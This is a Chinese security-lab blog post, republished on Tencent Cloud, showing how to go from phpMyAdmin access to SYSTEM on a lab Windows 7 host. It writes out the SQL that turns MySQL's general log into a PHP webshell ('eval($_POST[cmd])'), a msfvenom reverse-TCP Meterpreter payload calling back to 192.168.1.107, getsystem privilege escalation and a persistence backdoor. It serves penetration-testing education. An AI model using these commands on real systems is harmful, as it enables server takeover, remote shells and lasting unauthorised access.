前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >phpmyadmin getshell到提权

phpmyadmin getshell到提权

作者头像
Ms08067安全实验室
发布2020-03-19 11:19:53
9290
发布2020-03-19 11:19:53
举报
文章被收录于专栏:Ms08067安全实验室

一. 环境准备:

靶机:win7 32 位。

环境:

php:5.45

MYsql:5.5.53

Apache:2.4s

二. 开始攻击。

访问目标站点,发现开启3306 端口,

经过弱口令,爆破,目录泄露等途径已经获知PhpMyadmin的账号密码是root root

1.开始登陆到目标服务器的PhpMyadmin

2.检测MySQL全局变量(generallog、generallog file)的值。

general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。

general log file 指的是日志的保存路径。

代码语言:javascript
复制
SHOW VARIABLES LIKE 'general%'

已知general_log默认是关闭的,log日志存放的位置是C:\php\MySQL\data\SC-201805120002.log

开启generallog 的作用,开启它可以记录用户输入的每条命令,会把其保存在C:\php\MySQL\data\SC-201805120002.log下的一个log文件中,其实就是我们常说的日志文件。利用的思路是开启generallog之后把generallogfile的值修改为我们网站默认路径下一个自定义的php文件中,然后我们通过log日志进行写入一句话后门到上面去,然后再进一步利用。

代码语言:javascript
复制
set global general_log = "ON";
SET global general_log_file='C:/php/WWW/testshell.php';

在网站的根路径下生成了testshell.php的文件夹。

  1. ### 然后执行插入一句话木马。
代码语言:javascript
复制
select '<?php eval($_POST[cmd]);?>';
  1. ### 这时通过浏览访问一下一句话木马。

5.通过蚁剑连接一句话木马。

发现现在获取的权限为administrator权限,通过msf下getsystem来进行提权。

  1. ### 生成exe的反弹连接木马
代码语言:javascript
复制
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=4444 -f exe >testshell.exe

将生成的木马通过蚁剑上传到目标服务器并执行。

7.开msf监听,

使用getsystem来进行提权。

  1. ### 建立后门。

生成的后门文件路径:

后门加载成功

利用方式:

当用户登录到远程系统时,为我们打开一个Meterpreter会话

  1. ### 连接后门

成功。

总结:

1.在获取密码的过程中由于是本地搭建的,所以是知道密码的在实际使用中可以采用爆破的方式获取密码。

2.在获取一句话反弹连接后尝试获取密码失败,后面在msf下获取hash成功获取目标登录密码。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-03-13,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Ms08067安全实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 一. 环境准备:
  • 二. 开始攻击。
    • 1.开始登陆到目标服务器的PhpMyadmin
      • 2.检测MySQL全局变量(generallog、generallog file)的值。
        • 5.通过蚁剑连接一句话木马。
          • 7.开msf监听,
            • 总结:
            相关产品与服务
            云数据库 SQL Server
            腾讯云数据库 SQL Server (TencentDB for SQL Server)是业界最常用的商用数据库之一,对基于 Windows 架构的应用程序具有完美的支持。TencentDB for SQL Server 拥有微软正版授权,可持续为用户提供最新的功能,避免未授权使用软件的风险。具有即开即用、稳定可靠、安全运行、弹性扩缩等特点。
            领券
            问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档